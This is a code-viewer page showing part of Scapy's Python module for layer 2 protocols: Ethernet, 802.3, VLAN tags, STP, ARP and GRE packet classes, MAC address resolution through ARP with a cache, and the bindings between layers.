• Home
  • Line#
  • Scopes#
  • Navigate#
  • Raw
  • Download
1# SPDX-License-Identifier: GPL-2.0-only
2# This file is part of Scapy
3# See https://scapy.net/ for more information
4# Copyright (C) Philippe Biondi <phil@secdev.org>
5
6"""
7Classes and functions for layer 2 protocols.
8"""
9
10import itertools
11import socket
12import struct
13import time
14
15from scapy.ansmachine import AnsweringMachine
16from scapy.arch import get_if_addr, get_if_hwaddr
17from scapy.base_classes import Gen, Net, _ScopedIP
18from scapy.compat import chb
19from scapy.config import conf
20from scapy import consts
21from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \
22    DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \
23    DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, ETH_P_MACSEC
24from scapy.error import (
25    ScapyNoDstMacException,
26    log_runtime,
27    warning,
28)
29from scapy.fields import (
30    BCDFloatField,
31    BitField,
32    ByteEnumField,
33    ByteField,
34    ConditionalField,
35    FCSField,
36    FieldLenField,
37    IP6Field,
38    IPField,
39    IntEnumField,
40    IntField,
41    LenField,
42    MACField,
43    MultipleTypeField,
44    OUIField,
45    ShortEnumField,
46    ShortField,
47    SourceIP6Field,
48    SourceIPField,
49    StrFixedLenField,
50    StrLenField,
51    ThreeBytesField,
52    XByteField,
53    XIntField,
54    XShortEnumField,
55    XShortField,
56)
57from scapy.interfaces import _GlobInterfaceType, resolve_iface
58from scapy.packet import bind_layers, Packet
59from scapy.plist import (
60    PacketList,
61    QueryAnswer,
62    SndRcvList,
63    _PacketList,
64)
65from scapy.sendrecv import sendp, srp, srp1, srploop
66from scapy.utils import (
67    checksum,
68    hexdump,
69    hexstr,
70    in4_getnsmac,
71    in4_ismaddr,
72    inet_aton,
73    inet_ntoa,
74    mac2str,
75    pretty_list,
76    valid_mac,
77    valid_net,
78    valid_net6,
79)
80
81# Typing imports
82from typing import (
83    Any,
84    Callable,
85    Dict,
86    Iterable,
87    List,
88    Optional,
89    Tuple,
90    Type,
91    Union,
92    cast,
93)
94from scapy.interfaces import NetworkInterface
95
96
97if conf.route is None:
98    # unused import, only to initialize conf.route
99    import scapy.route  # noqa: F401
100
101
# type definitions
# A resolver is called with the layer 2 packet and the layer 3 packet it
# carries, and returns the layer 2 destination address as a string, or None
# when it cannot provide one.
_ResolverCallable = Callable[[Packet, Packet], Optional[str]]
104
105#################
106#  Tools        #
107#################
108
109
class Neighbor:
    """
    Registry of the callables able to find a layer 2 destination address.

    Resolvers are indexed by the pair (layer 2 class, layer 3 class) they
    have been registered for.
    """

    def __init__(self):
        # type: () -> None
        # (l2 class, l3 class) -> resolver callable
        self.resolvers = dict()  # type: Dict[Tuple[Type[Packet], Type[Packet]], _ResolverCallable] # noqa: E501

    def register_l3(self, l2, l3, resolve_method):
        # type: (Type[Packet], Type[Packet], _ResolverCallable) -> None
        """
        Record ``resolve_method`` as the resolver of ``l3`` carried by ``l2``.

        A previous registration for the same pair is replaced.
        """
        self.resolvers[(l2, l3)] = resolve_method

    def resolve(self, l2inst, l3inst):
        # type: (Packet, Packet) -> Optional[str]
        """
        Call the resolver registered for the classes of the two instances.

        :returns: what the resolver returns, or None when no resolver is
            registered for this exact pair of classes.
        """
        key = (l2inst.__class__, l3inst.__class__)
        try:
            resolver = self.resolvers[key]
        except KeyError:
            return None
        return resolver(l2inst, l3inst)

    def __repr__(self):
        # type: () -> str
        # One "l2 -> l3" line per registered pair
        rows = [
            "%-15s -> %-15s" % (lower.__name__, upper.__name__)
            for (lower, upper) in self.resolvers
        ]
        return "\n".join(rows)
129
130
# Global resolver registry; DestMACField queries it when a packet is built
conf.neighbor = Neighbor()

# IP -> MAC answers learnt by getmacbyip()
# cache entries expire after 120s
_arp_cache = conf.netcache.new_cache("arp_cache", 120)
135
136
@conf.commands.register
def getmacbyip(ip, chainCC=0):
    # type: (str, int) -> Optional[str]
    """
    Returns the destination MAC address used to reach a given IP address.

    The routing table is consulted first; an ARP request is only sent when
    the answer is neither implied by the address itself (multicast,
    broadcast, loopback) nor already present in the ARP cache.

    :param ip: the IPv4 address to reach. A Net is reduced to its first
        address, and an empty value is treated as "0.0.0.0".
    :param chainCC: forwarded as-is to srp1()
    :returns: the MAC address as a string, or None if the ARP request
        failed or stayed unanswered.

    .. seealso:: :func:`~scapy.layers.inet6.getmacbyip6` for IPv6.
    """
    # Normalise the address
    if isinstance(ip, Net):
        ip = next(iter(ip))
    ip = inet_ntoa(inet_aton(ip or "0.0.0.0"))

    # Multicast addresses map directly to a MAC
    if in4_ismaddr(ip):
        return in4_getnsmac(inet_aton(ip))

    # Ask the routing table which interface and gateway to use
    iff, _, gw = conf.route.route(ip)

    # Loopback interface or broadcast address of the interface
    if iff == conf.loopback_name or ip in conf.route.get_if_bcast(iff):
        return "ff:ff:ff:ff:ff:ff"

    # When a gateway is involved, it is the one whose MAC we need
    next_hop = ip if gw == "0.0.0.0" else gw

    # A cached answer avoids the ARP request altogether
    cached = _arp_cache.get(next_hop)
    if cached:
        return cached

    try:
        reply = srp1(
            Ether(dst=ETHER_BROADCAST) / ARP(op="who-has", pdst=next_hop),
            type=ETH_P_ARP,
            iface=iff,
            timeout=2,
            verbose=0,
            chainCC=chainCC,
            nofilter=1,
        )
    except Exception as ex:
        warning("getmacbyip failed on %s", ex)
        return None
    if reply is None:
        return None
    # Remember the answer for the next lookups
    mac = reply.payload.hwsrc
    _arp_cache[next_hop] = mac
    return mac
190
191
192# Fields
193
class DestMACField(MACField):
    """
    MAC field holding a layer 2 destination address that is resolved lazily.

    The default value is None. The actual address is only looked up, through
    conf.neighbor, when the machine representation is requested (see i2m).
    """

    def __init__(self, name):
        # type: (str) -> None
        MACField.__init__(self, name, None)

    def i2h(self, pkt, x):
        # type: (Optional[Packet], Optional[str]) -> str
        """
        Return the human representation of the field.

        No resolution is attempted here: while the value is still unset on
        an actual packet, a placeholder string is returned so that the
        caller gets a meaningful str instead of a bare None.
        """
        if x is None and pkt is not None:
            x = "None (resolved on build)"
        return super(DestMACField, self).i2h(pkt, x)

    def i2m(self, pkt, x):
        # type: (Optional[Packet], Optional[str]) -> bytes
        """
        Return the machine representation, resolving the address if unset.

        :raises ScapyNoDstMacException: if the address could not be resolved
            and conf.raise_no_dst_mac is set. Otherwise the broadcast address
            is used and a warning is emitted.
        """
        if x is None and pkt is not None:
            try:
                x = conf.neighbor.resolve(pkt, pkt.payload)
            except socket.error:
                # Best effort: a socket failure is handled like "not found"
                pass
            if x is None:
                if conf.raise_no_dst_mac:
                    raise ScapyNoDstMacException()
                else:
                    x = "ff:ff:ff:ff:ff:ff"
                    warning(
                        "MAC address to reach destination not found. Using broadcast."
                    )
        return super(DestMACField, self).i2m(pkt, x)
221
222
class SourceMACField(MACField):
    """
    MAC field whose unset value is replaced by the MAC of an interface.

    The interface is given by the ``getif`` callable, called with the packet.
    """
    __slots__ = ["getif"]

    def __init__(self, name, getif=None):
        # type: (str, Optional[Any]) -> None
        MACField.__init__(self, name, None)
        if getif is None:
            # Default: the interface returned first by the packet's route()
            def _route_iface(pkt):
                # type: (Any) -> Any
                return pkt.route()[0]
            getif = _route_iface
        self.getif = getif

    def i2h(self, pkt, x):
        # type: (Optional[Packet], Optional[str]) -> str
        # An explicit value is used untouched
        if x is not None:
            return super(SourceMACField, self).i2h(pkt, x)
        iff = self.getif(pkt)
        if iff:
            x = resolve_iface(iff).mac
        if x is None:
            # No interface, or an interface without a MAC
            x = "00:00:00:00:00:00"
        return super(SourceMACField, self).i2h(pkt, x)

    def i2m(self, pkt, x):
        # type: (Optional[Packet], Optional[Any]) -> bytes
        # Build from the human value so that the default gets filled in
        resolved = self.i2h(pkt, x)
        return super(SourceMACField, self).i2m(pkt, resolved)
244
245
246# Layers
247
# Names of the hardware type numbers, used to display the ARP "hwtype" field
HARDWARE_TYPES = {
    1: "Ethernet (10Mb)",
    2: "Ethernet (3Mb)",
    3: "AX.25",
    4: "Proteon ProNET Token Ring",
    5: "Chaos",
    6: "IEEE 802 Networks",
    7: "ARCNET",
    8: "Hyperchannel",
    9: "Lanstar",
    10: "Autonet Short Address",
    11: "LocalTalk",
    12: "LocalNet",
    13: "Ultra link",
    14: "SMDS",
    15: "Frame relay",
    16: "ATM",
    17: "HDLC",
    18: "Fibre Channel",
    19: "ATM",
    20: "Serial Line",
    21: "ATM",
}

# Add names for the EtherTypes of the tagging layers bound further down
# in this file (and for MACsec) to the shared ETHER_TYPES table
ETHER_TYPES[0x88a8] = '802_1AD'
ETHER_TYPES[0x88e7] = '802_1AH'
ETHER_TYPES[ETH_P_MACSEC] = '802_1AE'
275
276
class Ether(Packet):
    """
    Ethernet frame: destination MAC, source MAC and a 16-bit type.
    """
    name = "Ethernet"
    fields_desc = [
        DestMACField("dst"),
        SourceMACField("src"),
        XShortEnumField("type", 0x9000, ETHER_TYPES),
    ]
    __slots__ = ["_defrag_pos"]

    def hashret(self):
        # type: () -> bytes
        # The type, followed by whatever the payload hashes to
        own_hash = struct.pack("H", self.type)
        return own_hash + self.payload.hashret()

    def answers(self, other):
        # type: (Packet) -> int
        # Only an Ether with the same type can be answered; the decision
        # is then left to the payloads
        if isinstance(other, Ether) and self.type == other.type:
            return self.payload.answers(other.payload)
        return 0

    def mysummary(self):
        # type: () -> str
        return self.sprintf("%src% > %dst% (%type%)")

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        # type: (Optional[bytes], *Any, **Any) -> Type[Packet]
        # Without a complete 14-byte header there is nothing to look at
        if not _pkt or len(_pkt) < 14:
            return cls
        # A value up to 1500 in bytes 12-13 is a length: this is 802.3
        (type_or_len,) = struct.unpack("!H", _pkt[12:14])
        return Dot3 if type_or_len <= 1500 else cls
306
307
class Dot3(Packet):
    """
    802.3 frame: destination MAC, source MAC and a 16-bit payload length.
    """
    name = "802.3"
    fields_desc = [
        DestMACField("dst"),
        SourceMACField("src"),
        LenField("len", None, "H"),
    ]

    def extract_padding(self, s):
        # type: (bytes) -> Tuple[bytes, bytes]
        # The first "len" bytes are the payload, the remainder is padding
        cut = self.len
        payload, padding = s[:cut], s[cut:]
        return payload, padding

    def answers(self, other):
        # type: (Packet) -> int
        # Any other Dot3 may be answered: the payloads decide
        if not isinstance(other, Dot3):
            return 0
        return self.payload.answers(other.payload)

    def mysummary(self):
        # type: () -> str
        src, dst = self.src, self.dst
        return "802.3 %s > %s" % (src, dst)

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        # type: (Optional[Any], *Any, **Any) -> Type[Packet]
        # Without a complete 14-byte header there is nothing to look at
        if not _pkt or len(_pkt) < 14:
            return cls
        # A value above 1500 in bytes 12-13 is a type: this is Ethernet
        (type_or_len,) = struct.unpack("!H", _pkt[12:14])
        return Ether if type_or_len > 1500 else cls
336
337
class LLC(Packet):
    """
    LLC header: three one-byte fields (dsap, ssap and ctrl).
    """
    name = "LLC"
    fields_desc = [XByteField("dsap", 0x00),
                   XByteField("ssap", 0x00),
                   ByteField("ctrl", 0)]
343
344
def l2_register_l3(l2: Packet, l3: Packet) -> Optional[str]:
    """
    Resolver for intermediate layers: the layer 2 destination address is the
    one that resolves for ``l2`` and the payload carried by ``l3``.
    """
    registry = conf.neighbor  # type: Neighbor
    carried = l3.payload
    return registry.resolve(l2, carried)


# LLC does not determine the destination itself: look at what it carries
conf.neighbor.register_l3(Ether, LLC, l2_register_l3)
conf.neighbor.register_l3(Dot3, LLC, l2_register_l3)
355
356
# Names of the values of the "pkttype" field of CookedLinux / CookedLinuxV2
COOKED_LINUX_PACKET_TYPES = {
    0: "unicast",
    1: "broadcast",
    2: "multicast",
    3: "unicast-to-another-host",
    4: "sent-by-us"
}
364
365
class CookedLinux(Packet):
    """
    Linux "cooked" capture header (LINKTYPE_LINUX_SLL).
    """
    # Documentation: http://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL.html
    name = "cooked linux"
    # from wireshark's database
    # "src" always occupies 8 bytes, whatever the value of "lladdrlen"
    fields_desc = [ShortEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
                   XShortField("lladdrtype", 512),
                   ShortField("lladdrlen", 0),
                   StrFixedLenField("src", b"", 8),
                   XShortEnumField("proto", 0x800, ETHER_TYPES)]
375
376
class CookedLinuxV2(CookedLinux):
    """
    Linux "cooked" capture header, version 2 (LINKTYPE_LINUX_SLL2).

    The field list below replaces the one of CookedLinux entirely: "proto"
    comes first, "reserved" and "ifindex" are added, and "pkttype" and
    "lladdrlen" are one byte wide instead of two.
    """
    # Documentation: https://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL2.html
    name = "cooked linux v2"
    fields_desc = [XShortEnumField("proto", 0x800, ETHER_TYPES),
                   ShortField("reserved", 0),
                   IntField("ifindex", 0),
                   XShortField("lladdrtype", 512),
                   ByteEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES),
                   ByteField("lladdrlen", 0),
                   StrFixedLenField("src", b"", 8)]
387
388
class MPacketPreamble(Packet):
    """
    8-byte preamble placed in front of an Ethernet frame, with an FCS field.
    """
    # IEEE 802.3br Figure 99-3
    name = "MPacket Preamble"
    fields_desc = [StrFixedLenField("preamble", b"", length=8),
                   FCSField("fcs", 0, fmt="!I")]
394
395
class SNAP(Packet):
    """
    SNAP header: an OUI followed by a 16-bit code displayed using the
    EtherType names.
    """
    name = "SNAP"
    fields_desc = [OUIField("OUI", 0x000000),
                   XShortEnumField("code", 0x000, ETHER_TYPES)]


# SNAP does not determine the destination itself: look at what it carries
conf.neighbor.register_l3(Dot3, SNAP, l2_register_l3)
403
404
class Dot1Q(Packet):
    """
    802.1Q tag: priority, DEI and VLAN id bits followed by a 16-bit type.
    """
    name = "802.1Q"
    aliastypes = [Ether]
    fields_desc = [
        BitField("prio", 0, 3),
        BitField("dei", 0, 1),
        BitField("vlan", 1, 12),
        XShortEnumField("type", 0x0000, ETHER_TYPES),
    ]
    deprecated_fields = {
        "id": ("dei", "2.5.0"),
    }

    def answers(self, other):
        # type: (Packet) -> int
        # Facing something that is not tagged, let our payload decide
        if not isinstance(other, Dot1Q):
            return self.payload.answers(other)
        # Two tags must agree on both the type and the VLAN
        if (self.type == other.type) and (self.vlan == other.vlan):
            return self.payload.answers(other.payload)
        return 0

    def default_payload_class(self, pay):
        # type: (bytes) -> Type[Packet]
        # A "type" up to 1500 is a length: LLC follows
        return LLC if self.type <= 1500 else conf.raw_layer

    def extract_padding(self, s):
        # type: (bytes) -> Tuple[bytes, Optional[bytes]]
        type_or_len = self.type
        if type_or_len <= 1500:
            # Used as a length: it bounds the payload, the rest is padding
            return s[:type_or_len], s[type_or_len:]
        return s, None

    def mysummary(self):
        # type: () -> str
        lower = self.underlayer
        if isinstance(lower, Ether):
            # Include the addresses of the enclosing Ethernet frame
            return lower.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%")  # noqa: E501
        return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%")


# A tag does not determine the destination itself: look at what it carries
conf.neighbor.register_l3(Ether, Dot1Q, l2_register_l3)
447
448
class STP(Packet):
    """
    Spanning Tree Protocol BPDU.

    The root and the bridge are each described by a 16-bit id followed by a
    MAC address; the four timers are BCDFloatField values.
    """
    name = "Spanning Tree Protocol"
    fields_desc = [ShortField("proto", 0),
                   ByteField("version", 0),
                   ByteField("bpdutype", 0),
                   ByteField("bpduflags", 0),
                   ShortField("rootid", 0),
                   MACField("rootmac", ETHER_ANY),
                   IntField("pathcost", 0),
                   ShortField("bridgeid", 0),
                   MACField("bridgemac", ETHER_ANY),
                   ShortField("portid", 0),
                   BCDFloatField("age", 1),
                   BCDFloatField("maxage", 20),
                   BCDFloatField("hellotime", 2),
                   BCDFloatField("fwddelay", 15)]
465
466
class ARP(Packet):
    """
    ARP packet.

    The four address fields (hwsrc, psrc, hwdst, pdst) are MultipleTypeField:
    they are MAC / IPv4 / IPv6 fields when hwtype/hwlen and ptype/plen match
    those kinds of addresses, and raw fixed-length strings otherwise.
    """
    name = "ARP"
    fields_desc = [
        XShortEnumField("hwtype", 0x0001, HARDWARE_TYPES),
        XShortEnumField("ptype", 0x0800, ETHER_TYPES),
        # When left to None, the lengths are taken from hwsrc and psrc
        FieldLenField("hwlen", None, fmt="B", length_of="hwsrc"),
        FieldLenField("plen", None, fmt="B", length_of="psrc"),
        ShortEnumField("op", 1, {
            "who-has": 1,
            "is-at": 2,
            "RARP-req": 3,
            "RARP-rep": 4,
            "Dyn-RARP-req": 5,
            "Dyn-RAR-rep": 6,
            "Dyn-RARP-err": 7,
            "InARP-req": 8,
            "InARP-rep": 9
        }),
        # Each candidate field below comes with two conditions: one taking
        # the packet only, and one taking the packet and a value. The second
        # also accepts an unset length (None) as long as the value itself
        # looks like the right kind of address. The trailing
        # StrFixedLenField is used when no candidate matches.
        MultipleTypeField(
            [
                (SourceMACField("hwsrc"),
                 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
                  lambda pkt, val: pkt.hwtype == 1 and (
                      pkt.hwlen == 6 or (pkt.hwlen is None and
                                         (val is None or len(val) == 6 or
                                          valid_mac(val)))
                  ))),
            ],
            StrFixedLenField("hwsrc", None, length_from=lambda pkt: pkt.hwlen),
        ),
        MultipleTypeField(
            [
                (SourceIPField("psrc"),
                 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
                  lambda pkt, val: pkt.ptype == 0x0800 and (
                      pkt.plen == 4 or (pkt.plen is None and
                                        (val is None or valid_net(val)))
                  ))),
                (SourceIP6Field("psrc"),
                 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
                  lambda pkt, val: pkt.ptype == 0x86dd and (
                      pkt.plen == 16 or (pkt.plen is None and
                                         (val is None or valid_net6(val)))
                  ))),
            ],
            StrFixedLenField("psrc", None, length_from=lambda pkt: pkt.plen),
        ),
        MultipleTypeField(
            [
                (MACField("hwdst", ETHER_ANY),
                 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6,
                  lambda pkt, val: pkt.hwtype == 1 and (
                      pkt.hwlen == 6 or (pkt.hwlen is None and
                                         (val is None or len(val) == 6 or
                                          valid_mac(val)))
                  ))),
            ],
            StrFixedLenField("hwdst", None, length_from=lambda pkt: pkt.hwlen),
        ),
        MultipleTypeField(
            [
                (IPField("pdst", "0.0.0.0"),
                 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4,
                  lambda pkt, val: pkt.ptype == 0x0800 and (
                      pkt.plen == 4 or (pkt.plen is None and
                                        (val is None or valid_net(val)))
                  ))),
                (IP6Field("pdst", "::"),
                 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16,
                  lambda pkt, val: pkt.ptype == 0x86dd and (
                      pkt.plen == 16 or (pkt.plen is None and
                                         (val is None or valid_net6(val)))
                  ))),
            ],
            StrFixedLenField("pdst", None, length_from=lambda pkt: pkt.plen),
        ),
    ]

    def hashret(self):
        # type: () -> bytes
        # (op + 1) // 2 gives the same number for an opcode pair such as
        # 1 (who-has) and 2 (is-at), so a request and its reply hash alike
        return struct.pack(">HHH", self.hwtype, self.ptype,
                           ((self.op + 1) // 2)) + self.payload.hashret()

    def answers(self, other):
        # type: (Packet) -> int
        # Only an ARP whose opcode directly follows the other's can be
        # its answer (e.g. is-at after who-has)
        if not isinstance(other, ARP):
            return False
        if self.op != other.op + 1:
            return False
        # We use a loose comparison on psrc vs pdst to catch answers
        # with ARP leaks
        self_psrc = self.get_field('psrc').i2m(self, self.psrc)  # type: bytes
        other_pdst = other.get_field('pdst').i2m(other, other.pdst) \
            # type: bytes
        # Each side is truncated to the length of the other before comparing
        return self_psrc[:len(other_pdst)] == other_pdst[:len(self_psrc)]

    def route(self):
        # type: () -> Tuple[Optional[str], Optional[str], Optional[str]]
        # Route towards pdst, using the IPv4 or the IPv6 routing table
        # depending on the field currently selected for pdst
        fld, dst = cast(Tuple[MultipleTypeField, str],
                        self.getfield_and_val("pdst"))
        fld_inner, dst = fld._find_fld_pkt_val(self, dst)
        scope = None
        if isinstance(dst, (Net, _ScopedIP)):
            scope = dst.scope
        if isinstance(dst, Gen):
            # Several destinations: route according to the first one
            dst = next(iter(dst))
        if isinstance(fld_inner, IP6Field):
            return conf.route6.route(dst, dev=scope)
        elif isinstance(fld_inner, IPField):
            return conf.route.route(dst, dev=scope)
        else:
            # Neither IPv4 nor IPv6: nothing to route
            return None, None, None

    def extract_padding(self, s):
        # type: (bytes) -> Tuple[bytes, bytes]
        # ARP carries no payload: all the remaining bytes are padding
        return b"", s

    def mysummary(self):
        # type: () -> str
        if self.op == 1:
            return self.sprintf("ARP who has %pdst% says %psrc%")
        if self.op == 2:
            return self.sprintf("ARP is at %hwsrc% says %psrc%")
        return self.sprintf("ARP %op% %psrc% > %pdst%")
591
592
def l2_register_l3_arp(l2: Packet, l3: Packet) -> Optional[str]:
    """
    Resolves the default L2 destination address when ARP is used.

    :param l2: the layer 2 packet carrying the ARP (not used)
    :param l3: the ARP packet
    :returns: the broadcast MAC for a who-has; otherwise the MAC found for
        ``l3.pdst``, or None when pdst is neither an IPv4 nor an IPv6 address.
    """
    if l3.op == 1:  # who-has
        return "ff:ff:ff:ff:ff:ff"
    elif l3.op == 2:  # is-at
        # Not an error: the resolution below is still attempted
        log_runtime.warning(
            "You should be providing the Ethernet destination MAC address when "
            "sending an is-at ARP."
        )
    # Need ARP request to send ARP request...
    plen = l3.get_field("pdst").i2len(l3, l3.pdst)
    if plen == 4:
        return getmacbyip(l3.pdst)
    elif plen == 16:
        # An IPv6 address is 16 bytes long, which is also the plen the ARP
        # fields require to treat pdst as IPv6
        from scapy.layers.inet6 import getmacbyip6
        return getmacbyip6(l3.pdst)
    # Can't even do that
    log_runtime.warning(
        "You should be providing the Ethernet destination mac when sending this "
        "kind of ARP packets."
    )
    return None


conf.neighbor.register_l3(Ether, ARP, l2_register_l3_arp)
620
621
class GRErouting(Packet):
    """
    GRE routing entry: address family, offset, and a variable-length
    "routing_info" whose size is carried by the one-byte "SRE_len".
    """
    name = "GRE routing information"
    fields_desc = [ShortField("address_family", 0),
                   ByteField("SRE_offset", 0),
                   # Computed from routing_info when left to None
                   FieldLenField("SRE_len", None, "routing_info", "B"),
                   StrLenField("routing_info", b"",
                               length_from=lambda pkt: pkt.SRE_len),
                   ]
630
631
class GRE(Packet):
    """
    GRE header.

    The "chksum" and "offset" fields are present when either the checksum
    or the routing bit is set; "key" and "sequence_number" follow their own
    presence bit.
    """
    name = "GRE"
    deprecated_fields = {
        "seqence_number": ("sequence_number", "2.4.4"),
    }
    fields_desc = [BitField("chksum_present", 0, 1),
                   BitField("routing_present", 0, 1),
                   BitField("key_present", 0, 1),
                   BitField("seqnum_present", 0, 1),
                   BitField("strict_route_source", 0, 1),
                   BitField("recursion_control", 0, 3),
                   BitField("flags", 0, 5),
                   BitField("version", 0, 3),
                   XShortEnumField("proto", 0x0000, ETHER_TYPES),
                   ConditionalField(XShortField("chksum", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1),  # noqa: E501
                   ConditionalField(XShortField("offset", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1),  # noqa: E501
                   ConditionalField(XIntField("key", None), lambda pkt:pkt.key_present == 1),  # noqa: E501
                   ConditionalField(XIntField("sequence_number", None), lambda pkt:pkt.seqnum_present == 1),  # noqa: E501
                   ]

    @classmethod
    def dispatch_hook(cls, _pkt=None, *args, **kargs):
        # type: (Optional[Any], *Any, **Any) -> Type[Packet]
        """
        Select GRE_PPTP when the protocol type (bytes 2-3) is 0x880b.

        A buffer too short to hold the protocol type is left to this class
        instead of making struct.unpack() fail.
        """
        if _pkt and len(_pkt) >= 4:
            if struct.unpack("!H", _pkt[2:4])[0] == 0x880b:
                return GRE_PPTP
        return cls

    def post_build(self, p, pay):
        # type: (bytes, bytes) -> bytes
        """
        Append the payload and fill in the checksum if it was left unset.

        The checksum covers the header and the payload, and is written in
        bytes 4-5 of the result.
        """
        p += pay
        if self.chksum_present and self.chksum is None:
            c = checksum(p)
            p = p[:4] + chb((c >> 8) & 0xff) + chb(c & 0xff) + p[6:]
        return p
666
667
class GRE_PPTP(GRE):

    """
    Enhanced GRE header used with PPTP
    RFC 2637
    """

    name = "GRE PPTP"
    deprecated_fields = {
        "seqence_number": ("sequence_number", "2.4.4"),
    }
    fields_desc = [
        BitField("chksum_present", 0, 1),
        BitField("routing_present", 0, 1),
        BitField("key_present", 1, 1),
        BitField("seqnum_present", 0, 1),
        BitField("strict_route_source", 0, 1),
        BitField("recursion_control", 0, 3),
        BitField("acknum_present", 0, 1),
        BitField("flags", 0, 4),
        BitField("version", 1, 3),
        XShortEnumField("proto", 0x880b, ETHER_TYPES),
        ShortField("payload_len", None),
        ShortField("call_id", None),
        ConditionalField(
            XIntField("sequence_number", None),
            lambda pkt: pkt.seqnum_present == 1,
        ),
        ConditionalField(
            XIntField("ack_number", None),
            lambda pkt: pkt.acknum_present == 1,
        ),
    ]

    def post_build(self, p, pay):
        # type: (bytes, bytes) -> bytes
        # Header followed by payload; an explicit payload_len is left alone
        built = p + pay
        if self.payload_len is not None:
            return built
        # Otherwise write the payload length, big-endian, in bytes 4-5
        pay_len = len(pay)
        high = chb((pay_len >> 8) & 0xff)
        low = chb(pay_len & 0xff)
        return built[:4] + high + low + built[6:]
701
702
703# *BSD loopback layer
704
class LoIntEnumField(IntEnumField):
    """
    IntEnumField whose value is stored shifted left by 24 bits.
    """

    def m2i(self, pkt, x):
        # type: (Optional[Packet], int) -> int
        # Machine -> internal: drop the 24 low bits
        internal = x >> 24
        return internal

    def i2m(self, pkt, x):
        # type: (Optional[Packet], Union[List[int], int, None]) -> int
        # Internal -> machine: move the value back up by 24 bits
        value = cast(int, x)
        return value << 24
714
715
# https://github.com/wireshark/wireshark/blob/fe219637a6748130266a0b0278166046e60a2d68/epan/dissectors/packet-null.c
# https://www.wireshark.org/docs/wsar_html/epan/aftypes_8h.html
# Names of the values of the loopback "type" field. Several numbers are
# listed for IPv6.
LOOPBACK_TYPES = {0x2: "IPv4",
                  0x7: "OSI",
                  0x10: "Appletalk",
                  0x17: "Netware IPX/SPX",
                  0x18: "IPv6", 0x1c: "IPv6", 0x1e: "IPv6"}
723
724
725# On OpenBSD, Loopback = LoopbackOpenBSD. On other platforms, the 2 are available.
726# This is to be compatible with both tcpdump and tshark
727
class Loopback(Packet):
    r"""
    \*BSD loopback layer
    """
    __slots__ = ["_defrag_pos"]
    name = "Loopback"
    # The only field is a 32-bit "type". On OpenBSD it is a plain
    # IntEnumField; elsewhere LoIntEnumField is used, which stores the
    # value shifted by 24 bits.
    if consts.OPENBSD:
        fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)]
    else:
        fields_desc = [LoIntEnumField("type", 0x2, LOOPBACK_TYPES)]
738
739
# LoopbackOpenBSD always uses the plain IntEnumField encoding of "type".
# On OpenBSD this is what Loopback already does, so it is a mere alias there.
if consts.OPENBSD:
    LoopbackOpenBSD = Loopback
else:
    class LoopbackOpenBSD(Loopback):
        name = "OpenBSD Loopback"
        fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)]
746
747
class Dot1AD(Dot1Q):
    """
    802.1ad tag: same fields and behaviour as Dot1Q, under a different name.
    """
    name = '802_1AD'
750
751
class Dot1AH(Packet):
    """
    802.1ah tag: priority, DEI, NCA and reserved bits followed by a
    three-byte service identifier ("isid").
    """
    name = "802_1AH"
    fields_desc = [BitField("prio", 0, 3),
                   BitField("dei", 0, 1),
                   BitField("nca", 0, 1),
                   BitField("res1", 0, 1),
                   BitField("res2", 0, 2),
                   ThreeBytesField("isid", 0)]

    def answers(self, other):
        # type: (Packet) -> int
        # Only a Dot1AH with the same isid can be answered; the decision
        # is then left to the payloads
        if isinstance(other, Dot1AH):
            if self.isid == other.isid:
                return self.payload.answers(other.payload)
        return 0

    def mysummary(self):
        # type: () -> str
        # The closing parenthesis was missing from the summary
        return self.sprintf("802.1ah (isid=%Dot1AH.isid%)")


# A tag does not determine the destination itself: look at what it carries
conf.neighbor.register_l3(Ether, Dot1AH, l2_register_l3)
774
775
# Layer bindings. The keyword arguments name fields of the LOWER layer:
# they select the upper layer when dissecting, and are the values given to
# those fields when the upper layer is stacked on the lower one.
# The selector is therefore "type" for Ether / Dot1Q / Dot1AD, "proto" for
# CookedLinux / GRE and "code" for SNAP.
bind_layers(Dot3, LLC)
bind_layers(Ether, LLC, type=122)
bind_layers(Ether, LLC, type=34928)
bind_layers(Ether, Dot1Q, type=33024)
bind_layers(Ether, Dot1AD, type=0x88a8)
bind_layers(Ether, Dot1AH, type=0x88e7)
bind_layers(Dot1AD, Dot1AD, type=0x88a8)
bind_layers(Dot1AD, Dot1Q, type=0x8100)
bind_layers(Dot1AD, Dot1AH, type=0x88e7)
bind_layers(Dot1Q, Dot1AD, type=0x88a8)
bind_layers(Dot1Q, Dot1AH, type=0x88e7)
bind_layers(Dot1AH, Ether)
bind_layers(Ether, Ether, type=1)
bind_layers(Ether, ARP, type=2054)
bind_layers(CookedLinux, LLC, proto=122)
bind_layers(CookedLinux, Dot1Q, proto=33024)
bind_layers(CookedLinux, Dot1AD, proto=0x88a8)
bind_layers(CookedLinux, Dot1AH, proto=0x88e7)
bind_layers(CookedLinux, Ether, proto=1)
bind_layers(CookedLinux, ARP, proto=2054)
bind_layers(MPacketPreamble, Ether)
bind_layers(GRE, LLC, proto=122)
bind_layers(GRE, Dot1Q, proto=33024)
bind_layers(GRE, Dot1AD, proto=0x88a8)
bind_layers(GRE, Dot1AH, proto=0x88e7)
